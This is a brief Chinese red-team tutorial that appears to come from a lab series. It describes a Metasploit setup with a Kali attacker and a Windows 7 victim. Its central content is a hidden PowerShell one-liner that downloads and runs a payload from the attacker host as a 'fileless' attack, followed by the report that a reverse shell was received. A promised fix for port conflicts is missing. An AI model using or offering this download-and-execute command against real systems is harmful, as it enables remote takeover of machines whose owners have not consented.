#红队 #MSF #powershell
虚拟机环境搭建:
【Kali】,192.168.10.131
【win7】,192.168.10.134
接上文:【攻防技术系列】MSF进程迁移,用的是里面的 1.exe。
如果遇到端口占用情况,可以采用以下解决方案:
之后在【win7】中使用powershell执行以下命令,实现无文件落地攻击
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.10.131:8083/1.exe'))"
运行之后,cmd闪退,属于正常现象。
之后再【kali】中收到一条请求记录
同时,在MSF端成功收到反弹的shell
